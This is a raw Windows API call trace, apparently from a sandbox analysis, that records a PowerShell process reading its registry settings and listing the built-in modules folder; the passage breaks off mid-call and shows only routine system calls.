SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.214] CoTaskMemAlloc (cb=0x20e) returned 0x2386b5996e0 [0151.214] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2386b5996e0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0151.215] CoTaskMemFree (pv=0x2386b5996e0) [0151.215] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508e458 | out: phkResult=0xafa508e458*=0x688) returned 0x0 [0151.215] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508e4a8, lpData=0x0, lpcbData=0xafa508e4a0*=0x0 | out: lpType=0xafa508e4a8*=0x1, lpData=0x0, lpcbData=0xafa508e4a0*=0x56) returned 0x0 [0151.215] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508e4a8, lpData=0x238003667f8, lpcbData=0xafa508e4a0*=0x56 | out: lpType=0xafa508e4a8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508e4a0*=0x56) returned 0x0 [0151.215] RegCloseKey (hKey=0x688) returned 0x0 [0151.232] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xafa508e020, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0151.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xafa508e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0151.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e410) returned 1 [0151.332] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0151.332] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4fb0 [0151.337] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.338] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0151.344] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0151.344] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0151.344] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0151.344] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0151.345] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0151.345] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0151.345] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0151.345] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0151.346] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0151.346] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0151.346] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0151.346] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0151.346] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0151.347] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0151.347] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0151.347] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0151.347] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0151.348] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0151.348] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0151.348] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0151.349] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0151.349] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0151.349] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0151.349] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0151.350] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0151.350] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0151.350] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0151.350] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0151.351] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0151.351] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0151.351] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0151.353] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0151.353] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0151.353] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0151.354] FindNextFileW (in: hFindFile=0x2386d3b4fb0, 